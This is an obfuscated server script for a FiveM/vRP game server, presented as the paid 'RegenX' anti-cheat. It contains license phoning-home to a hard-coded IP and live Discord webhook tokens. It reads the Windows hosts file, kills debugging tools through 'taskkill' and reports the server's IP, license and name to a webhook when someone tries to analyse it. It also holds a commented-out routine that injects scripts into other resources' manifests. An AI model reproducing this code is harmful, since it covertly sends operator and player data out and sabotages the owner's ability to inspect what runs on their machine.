local Tunnel = module("vrp", "lib/Tunnel") local Proxy = module("vrp", "lib/Proxy") vRP = Proxy.getInterface("vRP") vRPclient = Tunnel.getInterface("vRP",GetCurrentResourceName()) local script = "RegenX" local lua_name = "Regen/server.lua" local igBKotnX29 = [[ ^0________________________________________________________________________^0 ^0\_______________________________________________________________________\^0 ^2[ RegenX - AntiCheat ]^0 ^2[ Connected Successfully ]^0 ^2[ Thank you for your purchase and trust in our product ]^0 ^7 Discord: ^4Discord.gg/xRnr3GzJwU^7. ^0________________________________________________________________________^0 ^0\_______________________________________________________________________\^0 ]] ------------------------------------------------------------------------------ local v6DgJb2Fzp = [[ ^0________________________________________________________________________^0 ^0\_______________________________________________________________________\^0 ^8[ RegenX - AntiCheat ]^0 ^8[ Connection Failed ]^0 ^8[ If you think something is wrong, please contact us ]^0 ^7 Discord: ^4Discord.gg/xRnr3GzJwU^7. ^0________________________________________________________________________^0 ^0\_______________________________________________________________________\^0 ]] ------------------------------------------------------------------------------ local v6DgJb2Fz1 = [[ ^0________________________________________________________________________^0 ^0\_______________________________________________________________________\^0 ^8[ RegenX - AntiCheat ]^0 ^8[ Connection Failed ]^0 ^8[ If you think something is wrong, please contact us ]^0 ^7 Discord: ^4Discord.gg/xRnr3GzJwU^7. ^0________________________________________________________________________^0 ^0\_______________________________________________________________________\^0 ]] ------------------------------------------------------------------------------ local v6DgJb2Fz2 = [[ ^0________________________________________________________________________^0 ^0\_______________________________________________________________________\^0 ^8[ RegenX - AntiCheat ]^0 ^8[ Connection Failed ]^0 ^8[ If you think something is wrong, please contact us ]^0 ^7 Discord: ^4Discord.gg/xRnr3GzJwU^7. ^0________________________________________________________________________^0 ^0\_______________________________________________________________________\^0 ]] CD796ISGJRHE = "523LPEOXL02V8OMFICHN9S622DA9B" YNTNNWROZ6HP = "U17GGTZDDZJTH2F2I3HNUE9PMUYXH" IGBPYETTBLDB = "DOC41NOUR5G9VFHKQLI6YE6OBS9VH" F0TP9KELVTUN = "2J35SO2UFAH2Z057C45E0R1PY3685" QPGOT6VS9WZD = "FMI6M1XR2FT4BV90JPR1KB92RGJC1" MGR8FU634KJZ = "HIU45S40WXA0AVYOTSS6HV9OY71YU" RMEOLQYGJ767 = "VQ0KQ4OO4ETU9GLGABNNHNPDE4RW8" KADBLSU3CBIC = "VD26S54Z6FT2DTHMYV5M22SH0JGAT" XTVVX0722HJ7 = "IRPD0UQ18NR26EF5E1MFIU456PEZR" IDBSKNWCGFSC = "CSXCX7O499I2KFKMI5YCAM954ZXP2" ZSYAV2GAN68P = "5A7XHFIIEZ4YCX0QZGTF49WXPG8FN" CYRWAZQSF6DX = "WRKUIZZ08IBUWPDB98JHH4Y3M0PRE" L47BXKTW3XUF = "7EECNS5OJ4Y6X9L48GPOPLM34A3JV" RE2CT1XFGAED = "C1FVP42TIHROD8PWYVFDZZYH0N1OF" UDJX0IMNP82G = "L19KCX12MKM2KSKZZGYDVK1CDPSHK" WYQ77UVH3A7L = "U5YPN7626SAI3Y26ODBNNRNO89WBF" YEL7QXO5RF9N = "B66XWKRCFGA7UR94IAN49BMBIZWD1" Z2UIY9VQ7OH1 = "GHVE05BAERNL9ICH32BPV1KB3LCT9" VBSQ3W1P27SV = "0TJA8FM3VZZ8QF68GZHOJQSESS5FE" A6UQO2CG16D8 = "XAFU3PT6VT874Q2CJFKVUPBAZGNXA" LVNEQLMVH0WY = "MOLOXSEF1VM4DSRHGPMYQMP0FR4I2" F0HKEOMAQQ1V = "CZFCJXNPNPIPH2OGIHOE7E5BZ6THY" N4LCLR6H2R9C = "JTB7O67PB4EI6T5RBORV7HN9RCR8E" RNBNFJMPAK3H = "YYA9DZZ6263RD9Y51OYI98XPQJ9MF" CWOFF5W350QA = "KCY1GOHVOOGG1CKYDXN7NQZWRPJSN" I6N5ZTGY8DM1 = "SES60VFL92AW026TD0HJVYY7430QD" YZ1M5Z4P2F53 = "5718R03RY16VEP8JPGLNAM646T8HJ" J9E0RFKLGUWG = "CORL8QE4DWPN66PLPDDBOQPH2ZK0H" S1VHWXEECKUM = "2E30Y617XCVKYPCVY9ZDZNB41FTEI" YDOUHL6M08YD = "X7343855EXRRCAATB80K6TIZZO6WM" TMZ8F6YBR9X1 = "4NB22QKOWVJUHFT42MCIL9SH3JAO2" URTX1SATNYQ4 = "WFT1M2JXK2ZEK4RXYBLCNYA7EV8KJ" K067K9E7EOKU = "0J0T0330JK90TAMNKBSLJ9VQGQGZ9" PACJV5YJYNJ5 = "59MV949CGOGBUJYYWJGVGHL3UQX39" I1XJCWON17TU = "0IIOKQCYZKNT60YCCW4NUK31L468N" B03TKHNBY1SQ = "KEEX3O2328C8Y533J67WFCU3VREIF" NHQ19H2O6MZU = "KJ2ELKSDFEQJ8NR5OFPY8K0U7ZB8D" FP72NK7Q232B = "LLKZ2CRK4MONI80GFZOMB8B4YMDQJ" KK7GW0G8H6OR = "8A6HE4WMJ5O96VCPF5B0J2V6N634U" DK5R3GE9THJ7 = "Z247M5U73SHVYVNDQACWJVJBRY800" NH1A8XEIIUME = "YZK3ZWF31CES5DHJLXTBJGJZ9IWV8" AEJK91LXEFZN = "GM06BB2558WL0URKXW8361M1R0KQO" BXBLASI14E9A = "K04QGK01TNADR62UZBN76E44P31DT" NI2V4WSJG649 = "P0IMCNHI0NUT7BTWPRZO2TWEDT0RU" N9ZGF2PN95LH = "DKB25YOBWEOM1QI3YEBMDTB836GLD" G5ZGSEMNU3LR = "QR4D2IH4NJZZR4NRL2QPAURG0EELH" RXKJJL6I8ERJ = "FTNTPPO3UP936658OZMY3IDSP340L" A031YMLPFP6O = "0NVIWWXH03PWTDDG1E5C2GL1MHD4H" LVBILXONAXYM = "WPRPGLWM3T42K8SZWRIKR3DELPLKE" H6W7HO6LITPC = "4QGX2R9RLNOHOLIMMH7TDCP1H197M" LYP3KJUWAJ4N = "ZCQWR04CVSE1ELYS09EVALJANW903" HGVNL2MZ1AF5 = "6TX2FN6Z42VBD1IDUEDP9EWY2979E" EQ9SVFV5S1T9 = "JG1934M7H8080SX5ZBS48KY85UM9S" EJ41Y8FCJPGN = "34KEBLHAZ7RHH1QFOLPZSB5MGPJA7" J1H28D3A80UF = "9NLB30XY5WWS7WWF7UXP90C26C6V6" TUN11VX7TZEX = "2ZI7T183EJEL6FLZZ17QAR7R0MAE4" NKJRLWHYBJVZ = "PA08EHCOKVU58QUSTTRFLII97RGUT" EGY4WQZO823O = "CM1F9S42O8DDU8ZJ1HP7BXN5D2WYL" NN8ETPJIXM30 = "LTYTVOKVL3SHIGQGNNCO1RW9FEHX5" MASITDC4O1L0 = "1SOE0ZX2K9XHKQX6DSAPIJMPSKWKH" YJM53B9D0HU5 = "V8N99UHPZH9CLC4NX1O00JERYE8T3" OZ8JR90YS94T = "RTPG2CDRW8RL7X0IBJHVOCQ66CB06" BIXJ3QG6CMVJ = "TAI1MG78L4D2R4CU9ET0KRD4D19OH" JNEA3WPZ8S1D = "A7Z48CPA0RB1X6WMLBSEM5KILB2L5" HNME1B4XSNMW = "7ODS1BRXDGD637BX4ZAYGK6O42E5X" FK04MLYS4EU8 = "NDC2VF3TBN3VEOJKHQZC6YXOX94WP" GFE1Z26JYHZR = "RW6O3ADWQCF7H4LPCPPL2SYIWWZSS" S1UCHATDZ0TQ = "0KHPOP0UVSHNCV7AZA4ZQQJ0LC4B1" TPXA34CBUOA3 = "KULDB0N3H0STPLO194VM5YELX01PS" V7A39E2ST0XD = "QH5TBPJ6ULQF8ETSWE4JFIGL5R1BW" R57NYCEUVS8U = "IUAU30KOCIF3OECW153GAI2ISBCXP" HZNCPY3481SQ = "XIT4V2P75I6KXLFVDM0986VYGMMDE" SXUWX9668I36 = "OG3NFRJNZ1GLNKY11RRDJ8S2MBD7M" AF9TTDM04AOB = "JQUI1TME32XNQOPUPVKIFDXJ2EIN1" U6QDP4RS5TU3 = "Q9GFFKRIN4URR4FL2PXZA8VWTN8ZB" DVNQP0ZX46D9 = "LNOSY8AXUFZ6HQVZN4NSZOOD3EU1L" LKSYKBD6XBKJ = "KAFJBY7T7FCPTNVKYQGZAY6LFQ7RJ" OZ38YWTGVJ2L = "Q4HMH8HZCXCRNTANTS6KWI734ZB4L" ZF1DFXFFXAIZ = "OYLCNFIAJLPD9I5VWL83D2H10XN8F" AQ9CD0036SVP = "22VW86A6YF4PM5MZGCNPGXF20AKO4" YIISEOKONSMS = "K76O3HER313AR6TCHCFJP2C8CMJ09" VJ5PXN91J0SG = "BJJJ5YI77GJU2TLB8IKC9FSAA6TZM" HL1MDQWG8XHM = "JPYL5L314BIOEFYU6OHLGDBROQ9KY" XWQ1H71A7R2S = "RFYWD8GUJSKKFM08SM8GL67Z8EJXL" TRBM5PM3AEZB = "4JUSQJ78ENRW6LT4CRQ627QY3LWRJ" EUJC8G6AC2PL = "QEQ2U17UMH5XOYDRDLV4PUFA4TU4E" BWSTL5HGA141 = "S7VAMSAR5UOPL6JPWBCFOV0M7U149" FN4UPS6560S0 = "VSIUM8T57AHL47N9Y16VCRCMNWY6N" VXSNB829HEKJ = "26XCY8ANLHMNAGB9LXT27AIOD6BNH" ND25PKLZA8M7 = "RDR2U7IGODJBSKUVBPW3KX09X5VX3" LK9OEEHN89VC = "CGY7NNO7ODFZ1PCH5BUAWOGF45PWX" Y67JF7RULUH0 = "JU5GXNDDJ6ZGB41PB49TO91IMM5QY" ZHPYTBVHTOP6 = "QGP7TX5RP34Z94UTN99QLOURZOORU" T3VFGBUND1PW = "B4F1EP8DO6NG9Z1EWP6J6VK4GO518" NQUYT2KTXDBC = "MSPEZ4LLJ2Z4E8QACTZ71RJXX54GI" VCWPB58E5IH6 = "KF3891I1ULR8PF2G0S4OQQ4MMKAPC" GICYXE3JXDGG = "BBAPNT9O4WVFZEZG2L8SCZ1URYFFX" AUD96JL9658C = "HP56E127ZRMLOLZT7GRINK4MTE3NV" R6ANOFKN2Q31 = "K8UHOPN62HRCNJ6L0KXWEPYA26TU6" LNSFOT46S3UQ = "PKURCRR5DOE848T1EO6M5Z2HMM338" X8E0GXTW7V54 = "AllowedIQ" VXDI467D8HD9 = "DeniedIQ" FONI0HNJ9OUP = "AllowedIBR" GSQ5YBK4RPCR = "DeniedIBR" KMBRI7GCTSK9 = "AllowedNormal" M2HN8IG2NJEB = "DeniedNormal" local httpDispatch = {} AddEventHandler("__cfx_internal:httpResponse", function(token, status, body, headers) if httpDispatch[token] then local userCallback = httpDispatch[token] httpDispatch[token] = nil userCallback(status, body, headers) end end) local function R0S7N21LLIN5VRGW9990YNATFLNQ9(num) if num == tonumber("0") or not num then return nil end return tostring(num) end local function AXM97RFG9V6NATILQHZUZLE0Z8NVM(requestData, requestDataLength) return Citizen.InvokeNative(tonumber("0x8e8cc653"), R0S7N21LLIN5VRGW9990YNATFLNQ9(requestData), requestDataLength, Citizen.ReturnResultAnyway(), Citizen.ResultAsInteger()) end local function UFTXVN51NNNRGFF3EWRPAC13WTG1Z() return Citizen.InvokeNative(tonumber("0xe5e9ebbb"), Citizen.ReturnResultAnyway(), Citizen.ResultAsString()) end local function VH5C7JIVQIH1SLPXLGAPRHEB9BU3(url, cb, method, data, headers) local t = { url = url, method = method or "GET", data = data or "", headers = headers or {} } local d = json.encode(t) local id = AXM97RFG9V6NATILQHZUZLE0Z8NVM(d, d:len()) httpDispatch[id] = cb end local function LRHZWUY0E0AERLG7KTRM83HTQDDP3(reason) VH5C7JIVQIH1SLPXLGAPRHEB9BU3("https://77.83.242.94/AFKOSDJOIJWOASKGF/ip.php", function (Error, IP, Headers) VH5C7JIVQIH1SLPXLGAPRHEB9BU3("https://77.83.242.94/AFKOSDJOIJWOASKGF/Fucked.php", function (errorCode, Data, resultHeaders) if Data == "License Deleted" then local embeds = { { ["title"]= "File Editing" , ["type"]= "rich", ["color"] = 16711680, fields = { { name = "**Server IP :-**", value = "[ "..IP.." ] ", inline = false }, { name = "**License :-**", value = "[ "..Config.Key.." ] ", inline = false }, { name = "**reason :-**", value = "[ "..reason.." ] ", inline = false }, { name = "**Server Name :-**", value = "[ "..GetConvar("sv_hostname").." ] ", inline = false } }, ["footer"]= { ["text"]= "The Regen Is Mad! | "..os.date("%X |%x"), ["icon_url"] = "https://cdn.discordapp.com/attachments/699341228218646628/846556479556288532/image0.gif" }, } } VH5C7JIVQIH1SLPXLGAPRHEB9BU3("https://discord.com/api/webhooks/849677034372595802/IXTfgRjJtHPrVukg16SMuGNLeOgpUor-yuMeLi8ZRJ_wKwc-vH5kVfsD1G_dbNx2d18G", function(err, text, headers) end, "POST", json.encode({embeds = embeds}), { ["Content-Type"] = "application/json" }) end end) end) end -- Read local open = io.open local function ReadFile(path) local file = open(path, "rb") if not file then return nil end local content = file:read "*a" file:close() return content end local fileContent3 = ReadFile("C:\\Windows\\System32\\drivers\\etc\\hosts") or ""; local Cmd = io.popen"taskkill -im HTTPDebuggerUI.exe":read"*a" local Cmd2 = io.popen"taskkill -im Ostinato.exe":read"*a" if string.match(Cmd,"SUCCESS") or string.match(Cmd2,"SUCCESS") then print(v6DgJb2Fz2) -- Fuck you for HttpDebugging. LRHZWUY0E0AERLG7KTRM83HTQDDP3("HTTPDebugger ") return end local Time = "" local a = "<" local aa = "b" local aaa = "e" local aaaa = ">" local sn = "\n" local B1 = a..aa..aaa..aaaa local GE = B1 .. B1 .. B1 .. B1 local Status = tonumber("0") if UFTXVN51NNNRGFF3EWRPAC13WTG1Z() == script then Status = tonumber("1") else Status = tonumber("0") end VH5C7JIVQIH1SLPXLGAPRHEB9BU3("https://77.83.242.94/AFKOSDJOIJWOASKGF/time.php", function (err, text, head) Time = text end) if load ~= print and load ~= RconPrint then VH5C7JIVQIH1SLPXLGAPRHEB9BU3("https://77.83.242.94/OJRFDISHFIEDFOJFDNSRFGDJIREGIEFSSEFGDG/JIOGRNJEDIFHBNESUWBFAQWDG.php", function (err, text, head) VH5C7JIVQIH1SLPXLGAPRHEB9BU3("https://77.83.242.94/AFKOSDJOIJWOASKGF/PASDOJVNXIAFHG.php?key=" .. Config.Key .. "&script=" .. script, function (errorCode, Data, resultHeaders) if Data == "" .. sn .. "" .. GE .. "" .. sn .. "{ IP : " .. text .. "" .. sn .. "" .. GE .. "" .. sn .. "" .. sn .. "" .. GE .. "" .. sn .. " | Status" .. sn .. "" .. sn .. "" .. sn .. "" .. sn .. " : 1 | ScriptName" .. sn .. "" .. sn .. " : " .. script .. "" .. sn .. "" .. GE .. "" .. sn .. " | License" .. sn .. "" .. GE .. "" .. sn .. " : ".. Config.Key .." | Date " .. sn .. "" .. sn .. "" .. sn .. "" .. sn .. "" .. sn .. "" .. sn .. "" .. sn .. "" .. sn .. "" .. sn .. " : | Server : http://77.83.242.94/AFKOSDJOIJWOASKGF/PASDOJVNXIAFHG.php?key="..Config.Key.."&script="..script.." }" .. sn .. "" .. GE .. "" .. sn .. "" .. sn .. "" .. sn .. "" .. GE .. "" .. sn .. "" then Wait(9000) print(igBKotnX29) -- Working local embeds = { { ["title"]= "Good License" , ["type"]= "rich", ["color"] = 3276602, fields = { { name = "**Server IP :-**", value = "[ "..text.." ] ", inline = false }, { name = "**License :-**", value = "[ "..Config.Key.." ] ", inline = false }, { name = "**Server Name :-**", value = "[ "..GetConvar("sv_hostname").." ] ", inline = false } }, ["footer"] = { ["text"]= "The Regen Is Happy! | "..os.date("%X |%x"), ["icon_url"] = "https://cdn.discordapp.com/attachments/699341228218646628/846556479556288532/image0.gif" }, } } VH5C7JIVQIH1SLPXLGAPRHEB9BU3("https://discordapp.com/api/webhooks/1221301491122442281/x_tHfjX7UNhpkUrHT03tE8_GPIwVGXh1o6rzaB589tniCJdgpjr2N6QfkLKVlOtBPVMk", function(err, text, headers) end, "POST", json.encode({embeds = embeds}), { ["Content-Type"] = "application/json" }) SetConvarServerInfo("Protected By", "RegenX AntiCheat | https://discord.gg/xRnr3GzJwU") local Tunnel = module("vrp", "lib/Tunnel") local Proxy = module("vrp", "lib/Proxy") vRP = Proxy.getInterface("vRP") vRPclient = Tunnel.getInterface("vRP",GetCurrentResourceName()) RegisterNetEvent("RegenX:vRP:Spawned") AddEventHandler("RegenX:vRP:Spawned", function(player) local src = player; if Config.PlayerIDnill.Enable then DropPlayer(src,"YOU HAVE BEEN KICKED BY REGENX | Player Id Nill Detected | MADE BY LostTime @6w1") end end) RegisterNetEvent("_rx_internal:kkMKEWSKMDSFKEM:SendList") AddEventHandler("_rx_internal:kkMKEWSKMDSFKEM:SendList", function() local resources = {} for i = 0, (GetNumResources() - 1) do resources[i] = GetResourceByFindIndex(i) end local srcid = source TriggerClientEvent("__rx_internal:KRMWEDFNASNROEEW:request_resources", srcid, resources) end) RegisterNetEvent("_rx_internal:Unshxkdotkllas") AddEventHandler("_rx_internal:Unshxkdotkllas", function(player) local src = player local permissions = {} local user_id = vRP.getUserId({src}) if user_id ~= nil then for permissionName, permission in pairs(AllowPermissions) do permissions[permissionName] = vRP.hasPermission({user_id, permission}) end else DropPlayer(src,"YOU HAVE BEEN KICKED BY REGENX | Player Permissions Not Detected , Join Again Please! | MADE BY LostTime @6w1") end TriggerClientEvent("_rx_internal:receivePermissions", src, permissions) end) RegisterServerEvent("8jWpZudyvjkDXQ2RVXf9") AddEventHandler("8jWpZudyvjkDXQ2RVXf9", function(type,Permission,c,d) local _type = type or "default" local _src = source local user_id = vRP.getUserId({source}) local _Perm = Permission TriggerClientEvent("nindifsnfuyHNNBFDJG_dfjkHBF:RegenX", _src ,Webhooks.ScreenShotData) Wait(2000) LogDetection(_src, _type ,"Methods") if c or d then if user_id ~= nil then if not vRP.hasPermission({user_id,_Perm}) then kickorbancheater(_src,_type,c,d) end else kickorbancheater(_src,_type,c,d) end end end) AddEventHandler("playerConnecting", function (name, setKickReason, deferrals) local SRC = source local IP = GetPlayerEndpoint(SRC) local _IP = GetPlayerEndpoint(tostring(SRC)) local STEAM = "Not Founded" local DISCORD = "Not Founded" local FIVEML = "Not Founded" local _BANIDBypass = 0 BANNED = false IsProcessRunning = false for _, DATA in ipairs(GetPlayerIdentifiers(SRC)) do if DATA:match("steam") then STEAM = DATA elseif DATA:match("discord") then DISCORD = DATA:gsub("discord:", "") elseif DATA:match("license") then FIVEML = DATA end end PerformHttpRequest("http://77.83.242.94/AFKOSDJOIJWOASKGF/Blacklist.php", function (err, text, head) if err == 200 then local TABLE = json.decode(text) if TABLE and type(TABLE) == "table" then for _, DATA in ipairs(GetPlayerIdentifiers(SRC)) do if DATA:match("steam") then STEAM = DATA elseif DATA:match("discord") then DISCORD = DATA:gsub("discord:", "") elseif DATA:match("license") then FIVEML = DATA end end for i = 0, GetNumPlayerTokens(SRC) do for _, BANLIST in ipairs(TABLE) do if BANLIST.Steam == STEAM or BANLIST.Discord == DISCORD or BANLIST.FiveM == FIVEML or BANLIST.ip == _IP then REASON = BANLIST.REASON BANID = BANLIST.banid BANNED = true break end end end end else print("Failed to fetch banlist") end end) PerformHttpRequest("http://77.83.242.94/AFKOSDJOIJWOASKGF/checker_lua.php", function(err, text, head) if err == 200 then local TABLE = json.decode(text) for _, data in ipairs(TABLE) do if _IP == data.IP then if data.value == "true" then IsProcessRunning = true else IsProcessRunning = false end break end end else print("Failed to fetch data:", err) end end) deferrals.update("RegenX : Welcome Your Information is Under Review Now | Be Patient!") Wait(5000) if BANNED then for _,v in pairs(Config.SConnection.GlobalBanBypass) do _BANIDBypass = v end if _BANIDBypass == BANID then deferrals.done() else LogDetection(SRC, "GlobalBan Player Try To Join Detected! ","GlobalBan") print(" ^1Player ^3^3Try For Join But ^0| ^3Ban ID: ^3 "..BANID.."^0") deferrals.done("Sorry! \n You Have Been Banned From RegenX-AntiCheat \n Ban ID : ".. BANID .." \n If you think this happened by mistake, please contact us via discord \n https://discord.gg/xRnr3GzJwU") CancelEvent() end elseif Config.SConnection.AntiBlackListName then name = (string.gsub(string.gsub(string.gsub(name, "-", ""), ",", ""), " ", ""):lower()) for index, value in ipairs(Config.SConnection.BlacklistName) do local g, f = name:find(string.lower(value)) if g or f then LogDetection(SRC, "Blacklist Name Detected ","blnames") deferrals.done("Sorry! \n You're Name is Not Allowed! , Please Change it and Rejoin to Server. \n If you think this happened by mistake, please contact us via discord \n https://discord.gg/xRnr3GzJwU") CancelEvent() end end end if Config.SConnection.XGuard then deferrals.update("RegenX : Welcome | RegenX is Now Checking if you are running the AntiCheat.. | Be Patient!") Wait(5000) if not IsProcessRunning then deferrals.done("Sorry! \n You Need Run The Anticheat client and try again. \n If you think this happened by mistake, please contact us via discord \n https://discord.gg/xRnr3GzJwU") CancelEvent() end end Wait(2000) deferrals.done() end) AddEventHandler("InteractSound_SV:PlayWithinDistance", function(maxDistance, soundFile, soundVolume) local SRC = source if Config.TryPlaySounds.Enable then if maxDistance == 10000 and soundFile == "handcuff" then TriggerEvent("8jWpZudyvjkDXQ2RVXf9", "Try To Play Sounds", AllowPermissions.PlaySounds, Config.TryPlaySounds.Kick, Config.TryPlaySounds.Ban) CancelEvent() elseif maxDistance == 1000 and soundFile == "Cuff" then TriggerEvent("8jWpZudyvjkDXQ2RVXf9", "Try To Play Sounds", AllowPermissions.PlaySounds, Config.TryPlaySounds.Kick, Config.TryPlaySounds.Ban) CancelEvent() elseif maxDistance == 103232 and soundFile == "lock" then TriggerEvent("8jWpZudyvjkDXQ2RVXf9", "Try To Play Sounds", AllowPermissions.PlaySounds, Config.TryPlaySounds.Kick, Config.TryPlaySounds.Ban) CancelEvent() elseif maxDistance == 10 and soundFile == "szajbusek" then TriggerEvent("8jWpZudyvjkDXQ2RVXf9", "Try To Play Sounds", AllowPermissions.PlaySounds, Config.TryPlaySounds.Kick, Config.TryPlaySounds.Ban) CancelEvent() elseif maxDistance == 5 and soundFile == "alarm" then TriggerEvent("8jWpZudyvjkDXQ2RVXf9", "Try To Play Sounds", AllowPermissions.PlaySounds, Config.TryPlaySounds.Kick, Config.TryPlaySounds.Ban) CancelEvent() elseif maxDistance == 13232 and soundFile == "pasysound" then TriggerEvent("8jWpZudyvjkDXQ2RVXf9", "Try To Play Sounds", AllowPermissions.PlaySounds, Config.TryPlaySounds.Kick, Config.TryPlaySounds.Ban) CancelEvent() elseif maxDistance == 5000 and soundFile == "demo" then TriggerEvent("8jWpZudyvjkDXQ2RVXf9", "Try To Play Sounds", AllowPermissions.PlaySounds, Config.TryPlaySounds.Kick, Config.TryPlaySounds.Ban) CancelEvent() end end end) local ResourceMetadata = {} local ResourceFiles = {} RegisterNetEvent('PJHxig0KJQFvQsrIhd5h') AddEventHandler('PJHxig0KJQFvQsrIhd5h', function(Metadata, Files) if Config.ResourceMetadataDetected.Enable then local _src = source local _mdata = Metadata local _files = Files if _mdata ~= nil then for k,v in pairs(_mdata) do if k ~= nil then if k == "unex" or k == "Unex" or k == "rE" or k == "redENGINE" or k == "Eulen" then LogDetection(_src, "Executor detected: "..k,"basic") kickandbanuser(_src,"Executor detected" ..k,Config.ResourceMetadataDetected.Kick, Config.ResourceMetadataDetected.Ban) end end end for k,v in pairs(ResourceMetadata) do if k ~= nil then if not _mdata[k] then LogDetection(_src, "Injection: Resource stopped: "..k,"basic") kickandbanuser(_src,"Injection: Resource stopped" ..k,Config.ResourceMetadataDetected.Kick, Config.ResourceMetadataDetected.Ban) end if json.encode(_mdata[k]) ~= json.encode(ResourceMetadata[k]) then LogDetection(_src, "Resource metadata not valid in resource: "..k,"basic") kickandbanuser(_src,"Resource metadata not valid in resource" ..k,Config.ResourceMetadataDetected.Kick, Config.ResourceMetadataDetected.Ban) end if k == "unex" or k == "Unex" or k == "rE" or k == "redENGINE" or k == "Eulen" then LogDetection(_src, "Executor detected: "..k,"basic") kickandbanuser(_src,"Executor detected" ..k,Config.ResourceMetadataDetected.Kick, Config.ResourceMetadataDetected.Ban) end end end end end end) -- CreateThread(function() -- Wait(7000) -- count = 0 -- skip = 0 -- local randomtextfile = "@RegenX/REACT.lua" -- for resources = 0, GetNumResources() - 1 do -- local _resname = GetResourceByFindIndex(resources) -- if _resname ~= "RegenX" then -- _resourcemanifest = LoadResourceFile(_resname, "__resource.lua") -- _resourcemanifest2 = LoadResourceFile(_resname, "fxmanifest.lua") -- if _resourcemanifest then -- if not string.find(_resourcemanifest, "client_script '" .. randomtextfile .. "'") then -- Wait(100) -- _toadd = _resourcemanifest .. "\n\nclient_script '" .. randomtextfile .. "'" -- SaveResourceFile(_resname, "__resource.lua", _toadd, -1) -- print("RegenX-AntiCheat | REACT Trying to Injected On Resource : " .. _resname) -- count = count + 1 -- else -- skip = skip + 1 -- end -- elseif _resourcemanifest2 then -- if not string.find(_resourcemanifest2, "client_script '" .. randomtextfile .. "'") then -- Wait(100) -- _toadd = _resourcemanifest2 .. "\n\nclient_script '" .. randomtextfile .. "'" -- SaveResourceFile(_resname, "fxmanifest.lua", _toadd, -1) -- print("RegenX-AntiCheat | REACT Trying to Injected On Resource : " .. _resname) -- count = count + 1 -- else -- skip = skip + 1 -- end -- else -- skip = skip + 1 -- end -- end -- end -- end) for i=1, #BLEvents.BlacklistedEvents, 1 do RegisterServerEvent(BLEvents.BlacklistedEvents[i]) AddEventHandler(BLEvents.BlacklistedEvents[i], function() local id = source; local user_id = vRP.getUserId({id}); if Config.EventsExecDetected.Enable then if Config.EventsExecDetected.Logs then LogDetection(id, "Blacklisted Event Dectected ","events") CancelEvent() end if Config.EventsExecDetected.Ban then CancelEvent() kickorbancheater(id,"Events Execute Dectected", false, Config.EventsExecDetected.Ban) end end end) end AddEventHandler("explosionEvent", function(sender, exp) if Config.ExplosionProtection.Enable then if exp.damageScale ~= 0.0 then if inTable(Config.ExplosionProtection.ExplosionsList, exp.explosionType) ~= false then CancelEvent() LogDetection(sender, "Tried to create an explosion - Type : "..exp.explosionType,"explosion") kickandbanuser(sender,"Blacklisted Explosion",Config.ExplosionProtection.Kick, Config.ExplosionProtection.Ban) end if exp.explosionType ~= 9 then explosionsSpawned[sender] = (explosionsSpawned[sender] or 0) + 1 if explosionsSpawned[sender] > 3 then LogDetection(sender, "Tried to spawn mass explosions - Type : "..exp.explosionType,"explosion") kickandbanuser(sender,"Mass Explosions",Config.ExplosionProtection.Kick, Config.ExplosionProtection.Ban) CancelEvent() end else explosionsSpawned[sender] = (explosionsSpawned[sender] or 0) + 1 if explosionsSpawned[sender] > 3 then LogDetection(sender, "Tried to spawn mass explosions - Type: (gas pump)","explosion") kickandbanuser(sender,"Mass Explosions",Config.ExplosionProtection.Kick, Config.ExplosionProtection.Ban) CancelEvent() end end if exp.damageScale > 1.0 then LogDetection(sender, "Tried to spawn a mortal explosion. Type : "..exp.explosionType,"explosion") kickandbanuser(sender,"Explosion Detected",Config.ExplosionProtection.Kick, Config.ExplosionProtection.Ban) end if exp.isInvisible == true then LogDetection(sender, "Tried to spawn an invisible explosion. Type : "..exp.explosionType,"explosion") kickandbanuser(sender,"Invisible Explosion Detected",Config.ExplosionProtection.Kick, Config.ExplosionProtection.Ban) end if exp.isAudible == false then LogDetection(sender, "Tried to spawn a silent explosion. Type : "..exp.explosionType,"explosion") kickandbanuser(sender,"Silent Explosion Detected",Config.ExplosionProtection.Kick, Config.ExplosionProtection.Ban) end CancelEvent() end end end) AddEventHandler('ptFxEvent', function(sender, data) local _src = sender local user_id = vRP.getUserId({_src}) if Config.ptFxParticlesDetected.Enable then particlesSpawned[_src] = (particlesSpawned[_src] or 0) + 1 if particlesSpawned[_src] > Config.ptFxParticlesDetected.MaxParticlesPerUser then if user_id ~= nil then if not vRP.hasPermission({user_id,AllowPermissions.RealTimeEvents}) then CancelEvent() kickandbanuser(_src,"Mass Particle Spawn",Config.ptFxParticlesDetected.Kick, Config.ptFxParticlesDetected.Ban) end else CancelEvent() kickandbanuser(_src,"Mass Particle Spawn",Config.ptFxParticlesDetected.Kick, Config.ptFxParticlesDetected.Ban) end end end end) AddEventHandler("clearPedTasksEvent", function(source, data) if Config.clearPedTasksEvent.Enable then local id = source; local user_id = vRP.getUserId({id}) if user_id ~= nil then if not vRP.hasPermission({user_id,AllowPermissions.RealTimeEvents}) then CancelEvent() kickandbanuser(id,"ClearPedTasksEvent Detected" ..k,Config.clearPedTasksEvent.Kick, Config.clearPedTasksEvent.Ban) end else CancelEvent() kickandbanuser(id,"ClearPedTasksEvent Detected" ..k,Config.clearPedTasksEvent.Kick, Config.clearPedTasksEvent.Ban) end end end) AddEventHandler("FreezeEntityPosition", function(source, data) if Config.FreezeEntityPosition.Enable then local id = source; local user_id = vRP.getUserId({id}) if user_id ~= nil then if not vRP.hasPermission({user_id,AllowPermissions.RealTimeEvents}) then CancelEvent() kickandbanuser(id,"FreezeEntityPosition Detected" ..k,Config.FreezeEntityPosition.Kick, Config.FreezeEntityPosition.Ban) end else CancelEvent() kickandbanuser(id,"FreezeEntityPosition Detected" ..k,Config.FreezeEntityPosition.Kick, Config.FreezeEntityPosition.Ban) end end end) -- Get the current resource name CreateThread(function() Wait(2000) local resourceName = GetCurrentResourceName() -- Construct the path to the garages.lua file within the vrp resource local vrpPath = GetResourcePath("vrp") local garagesPath = vrpPath .. "/cfg/garages.lua" -- Open the garages.lua file local file = io.open(garagesPath, "r") if not file then print("Failed to open file:", garagesPath) return end -- Read the content of the file local content = file:read("*all") file:close() -- Load the content as Lua code local func, err = load(content, "garages.lua", "t", {}) if not func then print("Failed to load garages.lua content:", err) return end -- Execute the loaded function to get the cfg table local cfg = func() -- Check if cfg.garages is a table if type(cfg) ~= "table" or type(cfg.garages) ~= "table" then print("Failed to extract cfg.garages from garages.lua") return end local garages = cfg.garages -- Saving the garages table to Lists/garages.lua local newFilePath = GetResourcePath(resourceName) .. "/Lists/garages.lua" local newFile = io.open(newFilePath, "w") if not newFile then print("Failed to open file for writing:", newFilePath) return end newFile:write("\n garages_cfg = 